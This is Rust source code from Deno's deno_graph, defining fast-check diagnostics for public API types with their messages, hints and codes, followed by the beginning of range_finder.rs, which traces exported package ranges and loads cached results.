#[error(
"public API member ({referrer}) is referencing or transitively referencing a class private member ({name})"
)]
UnsupportedPrivateMemberReference {
range: FastCheckDiagnosticRange,
name: String,
referrer: String,
},
#[error("super class expression was too complex")]
UnsupportedSuperClassExpr { range: FastCheckDiagnosticRange },
#[error(
"export assignments are a Common JS feature, which are not supported in ES modules"
)]
UnsupportedTsExportAssignment { range: FastCheckDiagnosticRange },
#[error(
"found namespace export, which is a global augmentation, which are not unsupported"
)]
UnsupportedTsNamespaceExport { range: FastCheckDiagnosticRange },
#[error("using declarations are not supproted in the public API")]
UnsupportedUsing { range: FastCheckDiagnosticRange },
#[error(
"referenced a JavaScript module without type declarations from a TypeScript module"
)]
UnsupportedNestedJavaScript { specifier: ModuleSpecifier },
#[error(
"used a JavaScript module without type declarations as an entrypoint"
)]
UnsupportedJavaScriptEntrypoint { specifier: ModuleSpecifier },
#[error("failed to emit fast check module: {inner:#}")]
Emit {
specifier: ModuleSpecifier,
inner: Arc<EmitError>,
},
#[error("export not found: {}", .specifier)]
ExportNotFound { specifier: ModuleSpecifier },
/// This is a special diagnostic that appears when a module is loaded from the
/// fast check cache that had a diagnostic. When we load a diagnostic from the
/// cache, we're only really interested in if there was a fast check diagnostic
/// and not what the diagnostic was because we just need to know if we can use
/// fast check for the package or not.
///
/// Note: This diagnostic will never (should never) be displayed to the user
/// because the fast check cache should not be used in deno lint or when
/// publishing.
#[error("diagnostic was cached")]
Cached { specifier: ModuleSpecifier },
}
impl FastCheckDiagnostic {
/// Return a human readable description of what the range of the diagnostic
/// is.
///
/// Panics if the diagnostic does not have a range.
pub fn range_description(&self) -> Option<&'static str> {
use FastCheckDiagnostic::*;
match self {
NotFoundReference { .. } => Some("this is the reference"),
MissingExplicitType { .. } => {
Some("this symbol is missing an explicit type")
}
MissingExplicitReturnType { .. } => {
Some("this function is missing an explicit return type")
}
UnsupportedAmbientModule { .. } => None,
UnsupportedComplexReference { .. } => Some("this is the reference"),
UnsupportedDefaultExportExpr { .. } => None,
UnsupportedDestructuring { .. } => None,
UnsupportedExpandoProperty { .. } => None,
UnsupportedGlobalModule { .. } => None,
UnsupportedRequire { .. } => None,
UnsupportedPrivateMemberReference { .. } => Some("this is the reference"),
UnsupportedSuperClassExpr { .. } => {
Some("this is the superclass expression")
}
UnsupportedTsExportAssignment { .. } => None,
UnsupportedTsNamespaceExport { .. } => None,
UnsupportedUsing { .. } => None,
UnsupportedNestedJavaScript { .. } => None,
UnsupportedJavaScriptEntrypoint { .. } => None,
Emit { .. } => None,
ExportNotFound { .. } => None,
Cached { .. } => None,
}
}
}
impl FastCheckDiagnostic {
pub fn specifier(&self) -> &ModuleSpecifier {
use FastCheckDiagnostic::*;
match self {
NotFoundReference { range, .. } => &range.specifier,
MissingExplicitType { range } => &range.specifier,
MissingExplicitReturnType { range, .. } => &range.specifier,
UnsupportedAmbientModule { range } => &range.specifier,
UnsupportedComplexReference { range, .. } => &range.specifier,
UnsupportedDefaultExportExpr { range } => &range.specifier,
UnsupportedDestructuring { range } => &range.specifier,
UnsupportedExpandoProperty { range, .. } => &range.specifier,
UnsupportedGlobalModule { range } => &range.specifier,
UnsupportedPrivateMemberReference { range, .. } => &range.specifier,
UnsupportedRequire { range } => &range.specifier,
UnsupportedSuperClassExpr { range } => &range.specifier,
UnsupportedTsExportAssignment { range } => &range.specifier,
UnsupportedTsNamespaceExport { range } => &range.specifier,
UnsupportedUsing { range } => &range.specifier,
UnsupportedJavaScriptEntrypoint { specifier } => specifier,
UnsupportedNestedJavaScript { specifier } => specifier,
Emit { specifier, .. } => specifier,
ExportNotFound { specifier, .. } => specifier,
Cached { specifier, .. } => specifier,
}
}
pub fn range(&self) -> Option<&FastCheckDiagnosticRange> {
use FastCheckDiagnostic::*;
match self {
NotFoundReference { range, .. } => Some(range),
MissingExplicitType { range } => Some(range),
MissingExplicitReturnType { range, .. } => Some(range),
UnsupportedAmbientModule { range } => Some(range),
UnsupportedComplexReference { range, .. } => Some(range),
UnsupportedDefaultExportExpr { range } => Some(range),
UnsupportedDestructuring { range } => Some(range),
UnsupportedExpandoProperty { range, .. } => Some(range),
UnsupportedGlobalModule { range } => Some(range),
UnsupportedPrivateMemberReference { range, .. } => Some(range),
UnsupportedRequire { range } => Some(range),
UnsupportedSuperClassExpr { range } => Some(range),
UnsupportedTsExportAssignment { range } => Some(range),
UnsupportedTsNamespaceExport { range } => Some(range),
UnsupportedUsing { range } => Some(range),
UnsupportedJavaScriptEntrypoint { .. } => None,
UnsupportedNestedJavaScript { .. } => None,
Emit { .. } => None,
ExportNotFound { .. } => None,
Cached { .. } => None,
}
}
}
impl deno_ast::diagnostics::Diagnostic for FastCheckDiagnostic {
fn level(&self) -> DiagnosticLevel {
use FastCheckDiagnostic::*;
match self {
NotFoundReference { .. }
| MissingExplicitType { .. }
| MissingExplicitReturnType { .. }
| UnsupportedAmbientModule { .. }
| UnsupportedComplexReference { .. }
| UnsupportedDefaultExportExpr { .. }
| UnsupportedDestructuring { .. }
| UnsupportedExpandoProperty { .. }
| UnsupportedGlobalModule { .. }
| UnsupportedRequire { .. }
| UnsupportedPrivateMemberReference { .. }
| UnsupportedSuperClassExpr { .. }
| UnsupportedTsExportAssignment { .. }
| UnsupportedTsNamespaceExport { .. }
| UnsupportedUsing { .. }
| UnsupportedNestedJavaScript { .. }
| Emit { .. }
| ExportNotFound { .. }
| Cached { .. } => DiagnosticLevel::Error,
UnsupportedJavaScriptEntrypoint { .. } => DiagnosticLevel::Warning,
}
}
fn code(&self) -> Cow<'_, str> {
// WARNING: When adding a code, make sure to update jsr
use FastCheckDiagnostic::*;
Cow::Borrowed(match self {
NotFoundReference { .. } => "not-found-reference",
MissingExplicitType { .. } => "missing-explicit-type",
MissingExplicitReturnType { .. } => "missing-explicit-return-type",
UnsupportedAmbientModule { .. } => "unsupported-ambient-module",
UnsupportedComplexReference { .. } => "unsupported-complex-reference",
UnsupportedDefaultExportExpr { .. } => "unsupported-default-export-expr",
UnsupportedDestructuring { .. } => "unsupported-destructuring",
UnsupportedExpandoProperty { .. } => "unsupported-expando-property",
UnsupportedGlobalModule { .. } => "unsupported-global-module",
UnsupportedRequire { .. } => "unsupported-require",
UnsupportedPrivateMemberReference { .. } => {
"unsupported-private-member-reference"
}
UnsupportedSuperClassExpr { .. } => "unsupported-super-class-expr",
UnsupportedTsExportAssignment { .. } => {
"unsupported-ts-export-assignment"
}
UnsupportedTsNamespaceExport { .. } => "unsupported-ts-namespace-export",
UnsupportedUsing { .. } => "unsupported-using",
UnsupportedNestedJavaScript { .. } => "unsupported-nested-javascript",
UnsupportedJavaScriptEntrypoint { .. } => {
"unsupported-javascript-entrypoint"
}
Emit { .. } => "emit",
ExportNotFound { .. } => "export-not-found",
Cached { .. } => "cached",
})
}
fn message(&self) -> Cow<'_, str> {
Cow::Owned(self.to_string())
}
fn location(&self) -> deno_ast::diagnostics::DiagnosticLocation<'_> {
match self.range() {
Some(range) => DiagnosticLocation::ModulePosition {
specifier: Cow::Borrowed(self.specifier()),
text_info: Cow::Borrowed(&range.text_info),
source_pos: DiagnosticSourcePos::SourcePos(range.range.start),
},
None => DiagnosticLocation::Module {
specifier: Cow::Borrowed(self.specifier()),
},
}
}
fn snippet(&self) -> Option<deno_ast::diagnostics::DiagnosticSnippet<'_>> {
self.range().map(|range| DiagnosticSnippet {
source: Cow::Borrowed(&range.text_info),
highlights: vec![DiagnosticSnippetHighlight {
style: DiagnosticSnippetHighlightStyle::Error,
range: DiagnosticSourceRange {
start: DiagnosticSourcePos::SourcePos(range.range.start),
end: DiagnosticSourcePos::SourcePos(range.range.end),
},
description: self.range_description().map(Cow::Borrowed),
}],
})
}
fn hint(&self) -> Option<Cow<'_, str>> {
use FastCheckDiagnostic::*;
Some(match self {
NotFoundReference { .. } => {
Cow::Borrowed("fix the reference to point to a symbol that exists")
}
MissingExplicitType { .. } => {
Cow::Borrowed("add an explicit type annotation to the symbol")
}
MissingExplicitReturnType {
is_definitely_void_or_never,
is_async,
..
} => {
if *is_definitely_void_or_never {
Cow::Borrowed(
"add an explicit return type of 'void' or 'never' to the function",
)
} else if *is_async {
Cow::Borrowed(
"add an explicit return type of 'Promise<void>' or 'Promise<never>' to the function",
)
} else {
Cow::Borrowed("add an explicit return type to the function")
}
}
UnsupportedAmbientModule { .. } => {
Cow::Borrowed("remove the ambient module declaration")
}
UnsupportedComplexReference { .. } => Cow::Borrowed(
"extract the shared type to a type alias and reference the type alias instead",
),
UnsupportedDefaultExportExpr { .. } => Cow::Borrowed(
"add an 'as' clause with an explicit type after the expression, or extract to a variable",
),
UnsupportedDestructuring { .. } => Cow::Borrowed(
"separate each destructured symbol into its own export statement",
),
UnsupportedExpandoProperty { reference_name, .. } => Cow::Owned(format!(
"rename '{}' to something else to avoid conflicts or create a temporary variable with a different name to use in the expando property reference",
reference_name
)),
UnsupportedGlobalModule { .. } => {
Cow::Borrowed("remove the 'global' augmentation")
}
UnsupportedRequire { .. } => {
Cow::Borrowed("use an import statement instead")
}
UnsupportedPrivateMemberReference { .. } => Cow::Borrowed(
"extract the type of the private member to a type alias and reference the type alias instead",
),
UnsupportedSuperClassExpr { .. } => {
Cow::Borrowed("extract the superclass expression into a variable")
}
UnsupportedTsExportAssignment { .. } => {
Cow::Borrowed("use an export statement instead")
}
UnsupportedTsNamespaceExport { .. } => {
Cow::Borrowed("remove the namespace export")
}
UnsupportedUsing { .. } => {
Cow::Borrowed("use 'const' instead of 'using'")
}
UnsupportedNestedJavaScript { .. } => Cow::Borrowed(
"add a type declaration (d.ts) for the JavaScript module, or rewrite it to TypeScript",
),
UnsupportedJavaScriptEntrypoint { .. } => Cow::Borrowed(
"add a type declaration (d.ts) for the JavaScript module, or rewrite it to TypeScript",
),
Emit { .. } => Cow::Borrowed(
"this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
),
// only a bug if the user sees these
ExportNotFound { .. } => Cow::Borrowed(
"this error is the result of a bug in Deno and you don't be seeing it - please open an issue if one doesn't exist",
),
Cached { .. } => Cow::Borrowed(
"this error is the result of a bug in Deno and you don't be seeing it - please open an issue if one doesn't exist",
),
})
}
fn snippet_fixed(
&self,
) -> Option<deno_ast::diagnostics::DiagnosticSnippet<'_>> {
None
}
fn info(&self) -> std::borrow::Cow<'_, [std::borrow::Cow<'_, str>]> {
use FastCheckDiagnostic::*;
match self {
NotFoundReference { .. } => Cow::Borrowed(&[Cow::Borrowed(
"this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
)]),
MissingExplicitType { .. } => Cow::Borrowed(&[Cow::Borrowed(
"all symbols in the public API must have an explicit type",
)]),
MissingExplicitReturnType {
is_definitely_void_or_never,
is_async,
..
} => {
let mut lines = vec![Cow::Borrowed(
"all functions in the public API must have an explicit return type",
)];
if *is_definitely_void_or_never {
if *is_async {
lines.push(Cow::Borrowed("async function expressions without a return statement can have a return type of either 'Promise<void>' or 'Promise<never>'"));
} else {
lines.push(Cow::Borrowed("function expressions without a return statement can have a return type of either 'void' or 'never'"));
}
lines.push(Cow::Borrowed("this function has no return statements, so a return type could not be inferred automatically"));
}
Cow::Owned(lines)
}
UnsupportedAmbientModule { .. } => Cow::Borrowed(&[Cow::Borrowed(
"ambient modules are not supported because they can modify the types of a module from outside of that module",
)]),
UnsupportedComplexReference { .. } => Cow::Borrowed(&[Cow::Borrowed(
"the reference was too complex to be resolved by fast check",
)]),
UnsupportedDefaultExportExpr { .. } => Cow::Borrowed(&[Cow::Borrowed(
"fast check was unable to infer the type of the default export expression",
)]),
UnsupportedDestructuring { .. } => Cow::Borrowed(&[Cow::Borrowed(
"destructuring can not be inferred by fast check",
)]),
UnsupportedExpandoProperty { .. } => Cow::Borrowed(&[Cow::Borrowed(
"expando properties get converted to a namespace and the reference conflicts with a namespace export",
)]),
UnsupportedGlobalModule { .. } => Cow::Borrowed(&[Cow::Borrowed(
"global augmentations are not supported because they can modify global types, which can affect other modules type checking",
)]),
UnsupportedRequire { .. } => Cow::Borrowed(&[Cow::Borrowed(
"CommonJS features such as require are not supported in ES modules",
)]),
UnsupportedPrivateMemberReference { .. } => Cow::Borrowed(&[
Cow::Borrowed(
"private members can not be referenced from public API members",
),
Cow::Borrowed(
"this is because fast check removes private members from the types",
),
]),
UnsupportedSuperClassExpr { .. } => Cow::Borrowed(&[Cow::Borrowed(
"fast check was unable to infer the type of the superclass expression",
)]),
UnsupportedTsExportAssignment { .. } => Cow::Borrowed(&[Cow::Borrowed(
"CommonJS features such as export assignments are not supported in ES modules",
)]),
UnsupportedTsNamespaceExport { .. } => Cow::Borrowed(&[Cow::Borrowed(
"namespace exports are not supported because they can modify the types of a module from outside of that module",
)]),
UnsupportedUsing { .. } => Cow::Borrowed(&[
Cow::Borrowed(
"using declarations have unclear semantics in the public API",
),
Cow::Borrowed("they are thus not supported in the public API"),
]),
UnsupportedNestedJavaScript { .. } => Cow::Borrowed(&[
Cow::Borrowed(
"JavaScript files with no corresponding declaration require type inference to be type checked",
),
Cow::Borrowed(
"fast check avoids type inference, so referencing a JavaScript file with no type declarations is not supported",
),
]),
UnsupportedJavaScriptEntrypoint { .. } => Cow::Borrowed(&[
Cow::Borrowed(
"JavaScript files with no corresponding declaration require type inference to be type checked",
),
Cow::Borrowed(
"fast check avoids type inference, so JavaScript entrypoints should be avoided",
),
]),
Emit { .. } => Cow::Borrowed(&[Cow::Borrowed(
"this error may be the result of a bug in Deno - if you think this is the case, please open an issue",
)]),
// only a bug if the user sees these
ExportNotFound { .. } => Cow::Borrowed(&[Cow::Borrowed(
"this error is the result of a bug in Deno and you don't be seeing it - please open an issue if one doesn't exist",
)]),
Cached { .. } => Cow::Borrowed(&[Cow::Borrowed(
"this error is the result of a bug in Deno and you don't be seeing it - please open an issue if one doesn't exist",
)]),
}
}
fn docs_url(&self) -> Option<Cow<'_, str>> {
Some(Cow::Owned(format!(
"https://jsr.io/go/slow-type-{}",
self.code()
)))
}
}
#[cfg(feature = "fast_check")]
pub fn build_fast_check_type_graph<'a>(
fast_check_cache: Option<&'a dyn FastCheckCache>,
jsr_url_provider: &'a dyn crate::source::JsrUrlProvider,
graph: &'a crate::ModuleGraph,
root_symbol: &'a crate::symbols::RootSymbol<'a>,
pending_nvs: std::collections::VecDeque<deno_semver::package::PackageNv>,
options: &TransformOptions,
) -> Vec<(
crate::ModuleSpecifier,
Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
)> {
use crate::fast_check::cache::fast_insecure_hash;
let fast_check_cache = if options.dts && fast_check_cache.is_some() {
debug_assert!(false, "using fast check cache with dts is not supported");
None
} else {
fast_check_cache
};
let public_modules = range_finder::find_public_ranges(
fast_check_cache,
jsr_url_provider,
graph,
root_symbol,
options.workspace_members,
pending_nvs,
);
let mut final_result = Vec::new();
for (nv, package) in public_modules {
log::debug!("Analyzing '{}' for fast check", nv);
let mut errors = Vec::new();
let mut fast_check_modules =
Vec::with_capacity(package.module_ranges.len());
if package.cache_items.is_empty() {
transform_package(
package.module_ranges,
root_symbol,
graph,
options,
&mut errors,
&mut fast_check_modules,
);
// fill the cache
if let Some(fast_check_cache) = fast_check_cache {
let mut package_cache_items =
Vec::with_capacity(fast_check_modules.len() + errors.len());
for (specifier, module_result) in &fast_check_modules {
let source_hash = graph
.get(specifier)
.and_then(|m| m.source())
.map(|s| fast_insecure_hash(s.as_bytes()))
.unwrap_or(0);
if errors.is_empty() {
let module = module_result.as_ref().ok().unwrap();
package_cache_items.push((
specifier.clone(),
FastCheckCacheModuleItem::Info(FastCheckCacheModuleItemInfo {
source_hash,
module_info: serde_json::to_string(&module.module_info)
.unwrap(),
text: module.text.clone(),
source_map: module.source_map.clone(),
}),
));
} else {
package_cache_items.push((
specifier.clone(),
FastCheckCacheModuleItem::Diagnostic(
FastCheckCacheModuleItemDiagnostic { source_hash },
),
));
}
}
for error in &errors {
let specifier = error.specifier();
let source_hash = graph
.get(specifier)
.and_then(|m| m.source())
.map(|s| fast_insecure_hash(s.as_bytes()))
.unwrap_or(0);
package_cache_items.push((
specifier.clone(),
FastCheckCacheModuleItem::Diagnostic(
FastCheckCacheModuleItemDiagnostic { source_hash },
),
));
}
let cache_key = FastCheckCacheKey::build(
fast_check_cache.hash_seed(),
&nv,
&package.entrypoints,
);
fast_check_cache.set(
cache_key,
FastCheckCacheItem {
dependencies: package.dependencies,
modules: package_cache_items,
},
);
}
if errors.is_empty() {
final_result.extend(fast_check_modules);
}
} else {
// use the items from the cache
final_result.extend(package.cache_items);
}
if !errors.is_empty() {
// If there are errors, insert a copy into each entrypoint.
//
// If one entrypoint can't be analyzed then we consider all
// entrypoints are non-analyzable because it's very difficult
// to determine the overlap of internal types between entrypoints.
for entrypoint in package.entrypoints {
final_result.push((entrypoint, Err(errors.clone())));
}
}
}
final_result
}
#[cfg(feature = "fast_check")]
fn transform_package(
package_module_ranges: indexmap::IndexMap<
ModuleSpecifier,
self::range_finder::ModulePublicRanges,
>,
root_symbol: &crate::symbols::RootSymbol<'_>,
graph: &crate::ModuleGraph,
options: &TransformOptions<'_>,
errors: &mut Vec<FastCheckDiagnostic>,
fast_check_modules: &mut Vec<(
url::Url,
Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
)>,
) {
for (specifier, mut ranges) in package_module_ranges {
let diagnostics = ranges.take_diagnostics();
let transform_result = if diagnostics.is_empty() {
let module_info = root_symbol
.module_from_specifier(&specifier)
.unwrap_or_else(|| panic!("module not found: {}", specifier));
if let Some(module_info) = module_info.esm() {
transform::transform(graph, module_info, &ranges, options).map(Some)
} else {
Ok(None) // nothing to transform
}
} else {
Err(diagnostics)
};
match transform_result {
Ok(Some(module)) => {
if errors.is_empty() {
fast_check_modules.push((specifier.clone(), Ok(module)));
}
}
Ok(None) => {
// skip
}
Err(d) => {
// don't clear the fast_check_modules here because we still
// use that to construct the package's cache items
errors.extend(d);
if options.should_error_on_first_diagnostic {
return; // no need to continue analyzing the package
}
}
}
}
}
| rust | MIT | 200a22dbd56b311d490ad00bed57fce34538598e | 2026-01-04T20:22:02.257944Z | false |
denoland/deno_graph | https://github.com/denoland/deno_graph/blob/200a22dbd56b311d490ad00bed57fce34538598e/src/fast_check/range_finder.rs | src/fast_check/range_finder.rs | // Copyright 2018-2024 the Deno authors. MIT license.
use std::borrow::Cow;
use std::collections::BTreeSet;
use std::collections::HashMap;
use std::collections::HashSet;
use std::collections::VecDeque;
use std::sync::Arc;
use deno_ast::SourceRange;
use deno_ast::SourceRangedForSpanned;
use deno_ast::swc::ast::Expr;
use deno_semver::package::PackageNv;
use indexmap::IndexMap;
use url::Url;
use super::FastCheckCache;
use super::FastCheckCacheItem;
use super::FastCheckCacheKey;
use super::FastCheckDiagnosticRange;
use super::FastCheckModule;
use crate::ModuleGraph;
use crate::ModuleSpecifier;
use crate::WorkspaceMember;
use crate::source::JsrUrlProvider;
use crate::symbols::FileDepName;
use crate::symbols::ModuleInfoRef;
use crate::symbols::ResolveDepsMode;
use crate::symbols::ResolvedExportOrReExportAllPath;
use crate::symbols::RootSymbol;
use crate::symbols::SymbolDeclKind;
use crate::symbols::SymbolId;
use crate::symbols::SymbolNodeDep;
use crate::symbols::SymbolNodeRef;
use super::FastCheckDiagnostic;
use super::cache::fast_insecure_hash;
#[derive(Default, Debug, Clone, PartialEq, Eq)]
struct NamedSubset(IndexMap<String, Exports>);
impl NamedSubset {
pub fn from_parts(parts: &[String]) -> Self {
let mut exports = Self::default();
if !parts.is_empty() {
exports.add_qualified(parts[0].to_string(), &parts[1..]);
}
exports
}
pub fn add(&mut self, export: String) {
match self.0.entry(export) {
indexmap::map::Entry::Occupied(mut entry) => {
*entry.get_mut() = Exports::All;
}
indexmap::map::Entry::Vacant(entry) => {
entry.insert(Exports::All);
}
}
}
pub fn add_qualified(&mut self, export_name: String, qualified: &[String]) {
if qualified.is_empty() {
self.add(export_name);
} else {
let entry = self.0.entry(export_name).or_insert_with(Exports::subset);
if matches!(entry, Exports::All) {
return;
}
entry.add_qualified(&qualified[0], &qualified[1..]);
}
}
pub fn add_named(&mut self, export: String, exports: Exports) {
match self.0.entry(export) {
indexmap::map::Entry::Occupied(mut entry) => {
let entry = entry.get_mut();
entry.extend(exports);
}
indexmap::map::Entry::Vacant(entry) => {
entry.insert(exports);
}
}
}
pub fn extend(&mut self, new_subset: NamedSubset) -> NamedSubset {
let mut difference = NamedSubset::default();
for (key, exports) in new_subset.0 {
if let Some(entry) = self.0.get_mut(&key) {
let sub_diff = entry.extend(exports);
if let Some(sub_diff) = sub_diff {
difference.add_named(key.clone(), sub_diff);
}
} else {
difference.add_named(key.clone(), exports.clone());
self.0.insert(key, exports);
}
}
difference
}
}
#[derive(Debug, Clone, PartialEq, Eq)]
enum Exports {
All,
Subset(NamedSubset),
}
impl Exports {
pub fn subset() -> Self {
Self::Subset(Default::default())
}
pub fn add_qualified(&mut self, export_name: &str, qualified: &[String]) {
let Exports::Subset(inner) = self else {
return;
};
inner.add_qualified(export_name.to_string(), qualified)
}
pub fn extend(&mut self, new_named: Exports) -> Option<Exports> {
let current_subset = &mut match self {
Exports::All => return None,
Exports::Subset(inner) => inner,
};
match new_named {
Exports::All => {
*self = Exports::All;
Some(Exports::All)
}
Exports::Subset(new_subset) => {
let difference = current_subset.extend(new_subset);
if difference.0.is_empty() {
None
} else {
Some(Exports::Subset(difference))
}
}
}
}
}
#[derive(Debug, Clone)]
enum ImportedExports {
Star,
StarWithDefault,
Subset(NamedSubset),
}
impl ImportedExports {
pub(crate) fn from_file_dep_name(dep_name: &FileDepName) -> Self {
match dep_name {
FileDepName::Star => ImportedExports::Star,
FileDepName::Name(value) => {
let mut named_exports = NamedSubset::default();
named_exports.add(value.clone());
ImportedExports::Subset(named_exports)
}
}
}
pub fn star_with_default() -> ImportedExports {
ImportedExports::StarWithDefault
}
pub fn star() -> ImportedExports {
ImportedExports::Star
}
pub fn subset(named: NamedSubset) -> ImportedExports {
ImportedExports::Subset(named)
}
/// Adds the incoming exports to the existing exports and
/// returns the newly added exports that have not previously
/// been added.
pub(crate) fn add(
&mut self,
exports_to_trace: ImportedExports,
) -> Option<ImportedExports> {
match self {
ImportedExports::Star => match exports_to_trace {
ImportedExports::Star => None,
ImportedExports::StarWithDefault => {
*self = ImportedExports::StarWithDefault;
let mut named_exports = NamedSubset::default();
named_exports.add("default".to_string());
Some(ImportedExports::Subset(named_exports))
}
ImportedExports::Subset(_) => None,
},
ImportedExports::StarWithDefault => None,
ImportedExports::Subset(current_subset) => match exports_to_trace {
ImportedExports::Star => {
*self = ImportedExports::Star;
Some(ImportedExports::Star)
}
ImportedExports::StarWithDefault => {
*self = ImportedExports::StarWithDefault;
Some(ImportedExports::StarWithDefault)
}
ImportedExports::Subset(new_subset) => {
Some(ImportedExports::Subset(current_subset.extend(new_subset)))
}
},
}
}
}
#[derive(Default)]
struct HandledExports(HashMap<ModuleSpecifier, ImportedExports>);
impl HandledExports {
pub fn add(
&mut self,
dep_specifier: &ModuleSpecifier,
traced_exports: ImportedExports,
) -> Option<ImportedExports> {
if let Some(handled_exports) = self.0.get_mut(dep_specifier) {
handled_exports.add(traced_exports)
} else {
self.0.insert(dep_specifier.clone(), traced_exports.clone());
Some(traced_exports)
}
}
}
#[derive(Default)]
struct PendingTraces(IndexMap<ModuleSpecifier, (PackageNv, ImportedExports)>);
impl PendingTraces {
pub fn add(
&mut self,
package_nv: PackageNv,
dep_specifier: ModuleSpecifier,
exports_to_trace: ImportedExports,
) {
if let Some((_, current_exports_to_trace)) = self.0.get_mut(&dep_specifier)
{
current_exports_to_trace.add(exports_to_trace);
} else {
self.0.insert(dep_specifier, (package_nv, exports_to_trace));
}
}
pub fn pop(&mut self) -> Option<PendingTrace> {
self
.0
.pop()
.map(|(specifier, (package_nv, exports_to_trace))| PendingTrace {
package_nv,
specifier,
exports_to_trace,
})
}
}
#[derive(Debug)]
struct PendingTrace {
pub package_nv: PackageNv,
pub specifier: ModuleSpecifier,
pub exports_to_trace: ImportedExports,
}
pub fn find_public_ranges<'a>(
fast_check_cache: Option<&'a dyn FastCheckCache>,
jsr_url_provider: &'a dyn JsrUrlProvider,
graph: &'a ModuleGraph,
root_symbol: &'a RootSymbol<'a>,
workspace_members: &'a [WorkspaceMember],
pending_nvs: VecDeque<PackageNv>,
) -> HashMap<PackageNv, PackagePublicRanges> {
PublicRangeFinder {
seen_nvs: pending_nvs.iter().cloned().collect(),
traced_exports: Default::default(),
pending_nvs,
pending_traces: Default::default(),
public_ranges: Default::default(),
fast_check_cache,
graph,
workspace_members,
root_symbol,
url_converter: RegistryUrlConverter {
jsr_url_provider,
workspace_members,
},
}
.find()
}
#[derive(Debug, Default)]
pub struct ModulePublicRanges {
ranges: HashSet<SourceRange>,
impl_with_overload_ranges: HashSet<SourceRange>,
diagnostics: Vec<FastCheckDiagnostic>,
}
impl ModulePublicRanges {
pub fn contains(&self, range: &SourceRange) -> bool {
self.ranges.contains(range)
}
pub fn is_impl_with_overloads(&self, range: &SourceRange) -> bool {
self.impl_with_overload_ranges.contains(range)
}
pub fn take_diagnostics(&mut self) -> Vec<FastCheckDiagnostic> {
std::mem::take(&mut self.diagnostics)
}
}
struct RegistryUrlConverter<'a> {
jsr_url_provider: &'a dyn JsrUrlProvider,
workspace_members: &'a [WorkspaceMember],
}
impl RegistryUrlConverter<'_> {
fn registry_package_url(&self, nv: &PackageNv) -> Url {
if let Some(member) = self.workspace_members.iter().find(|m| {
m.name == nv.name
&& m.version.as_ref().map(|v| v == &nv.version).unwrap_or(true)
}) {
member.base.clone()
} else {
self.jsr_url_provider.package_url(nv)
}
}
fn registry_package_url_to_nv(&self, url: &Url) -> Option<PackageNv> {
if url.scheme() == "file" {
for member in self.workspace_members.iter() {
if url.as_str().starts_with(member.base.as_str()) {
return Some(member.as_nv());
}
}
None
} else {
self.jsr_url_provider.package_url_to_nv(url)
}
}
}
#[derive(Debug, Default)]
pub struct PackagePublicRanges {
pub entrypoints: BTreeSet<ModuleSpecifier>,
// uses an IndexMap to maintain order so that when transforming
// it goes over the modules in the exact same deterministic order
pub module_ranges: IndexMap<ModuleSpecifier, ModulePublicRanges>,
/// Items loaded from the cache. If set, these should be used over module_ranges.
pub cache_items: Vec<(
ModuleSpecifier,
Result<FastCheckModule, Vec<FastCheckDiagnostic>>,
)>,
pub dependencies: BTreeSet<PackageNv>,
}
struct PublicRangeFinder<'a> {
url_converter: RegistryUrlConverter<'a>,
graph: &'a ModuleGraph,
fast_check_cache: Option<&'a dyn FastCheckCache>,
workspace_members: &'a [WorkspaceMember],
root_symbol: &'a RootSymbol<'a>,
pending_nvs: VecDeque<PackageNv>,
pending_traces: PendingTraces,
traced_exports: HandledExports,
seen_nvs: HashSet<PackageNv>,
public_ranges: HashMap<PackageNv, PackagePublicRanges>,
}
impl<'a> PublicRangeFinder<'a> {
pub fn find(mut self) -> HashMap<PackageNv, PackagePublicRanges> {
while let Some(nv) = self.pending_nvs.pop_front() {
let Some(exports) = self
.graph
.packages
.package_exports(&nv)
.map(Cow::Borrowed)
.or_else(|| {
Some(Cow::Owned(
self
.workspace_members
.iter()
.find(|m| {
m.name == nv.name
&& m
.version
.as_ref()
.map(|v| *v == nv.version)
.unwrap_or(true)
})?
.exports
.iter()
.map(|(k, v)| (k.clone(), v.clone()))
.collect(),
))
})
else {
// may happen in a segmented graph since graph
// segmentation is not that smart at the moment
continue;
};
let base_url = self.url_converter.registry_package_url(&nv);
let entrypoints = exports
.values()
.map(|value| {
// if we got this far, then the export must be valid, so we can unwrap
base_url.join(value).unwrap()
})
.collect::<BTreeSet<_>>();
match self.try_get_cache_item(&nv, &entrypoints) {
Some(mut public_ranges) => {
log::debug!("Using FastCheck cache for: {}", nv);
public_ranges.entrypoints = entrypoints;
self.public_ranges.insert(nv, public_ranges);
}
_ => {
let mut had_diagnostic = false;
for specifier in &entrypoints {
// check for untyped or non-existent entrypoints
let diagnostic = if let Some(module) = self.graph.get(specifier) {
if is_module_typed(module) {
None
} else {
Some(FastCheckDiagnostic::UnsupportedJavaScriptEntrypoint {
specifier: specifier.clone(),
})
}
} else {
// should never happen
Some(FastCheckDiagnostic::ExportNotFound {
specifier: specifier.clone(),
})
};
if let Some(diagnostic) = diagnostic {
self
.public_ranges
.entry(nv.clone())
.or_default()
.module_ranges
.entry(specifier.clone())
.or_default()
.diagnostics
.push(diagnostic);
had_diagnostic = true;
}
}
if !had_diagnostic {
for specifier in &entrypoints {
self.add_pending_trace(
&nv,
specifier,
ImportedExports::star_with_default(),
);
}
}
while let Some(trace) = self.pending_traces.pop() {
self.analyze_trace(&trace);
}
let public_ranges = self.public_ranges.entry(nv).or_default();
public_ranges.entrypoints = entrypoints;
}
}
}
self.public_ranges
}
fn try_get_cache_item(
&mut self,
nv: &PackageNv,
entrypoints: &BTreeSet<ModuleSpecifier>,
) -> Option<PackagePublicRanges> {
let fast_check_cache = self.fast_check_cache?;
let cache_key =
FastCheckCacheKey::build(fast_check_cache.hash_seed(), nv, entrypoints);
let cache_item = fast_check_cache.get(cache_key)?;
if !self.is_cache_item_valid(&cache_item) {
return None;
}
// fill in the dependencies
for dep in cache_item.dependencies {
self.add_pending_nv_no_referrer(&dep)
}
// now fill in the entry
let mut package = PackagePublicRanges::default();
for (url, cache_item) in cache_item.modules {
match cache_item {
super::cache::FastCheckCacheModuleItem::Info(info) => {
let Ok(module_info) = serde_json::from_str(&info.module_info) else {
return None;
};
package.cache_items.push((
url,
Ok(FastCheckModule {
module_info: Arc::new(module_info),
text: info.text,
source_map: info.source_map,
dts: None,
}),
));
}
super::cache::FastCheckCacheModuleItem::Diagnostic(_) => {
package.cache_items.push((
url.clone(),
Err(vec![FastCheckDiagnostic::Cached { specifier: url }]),
));
}
}
}
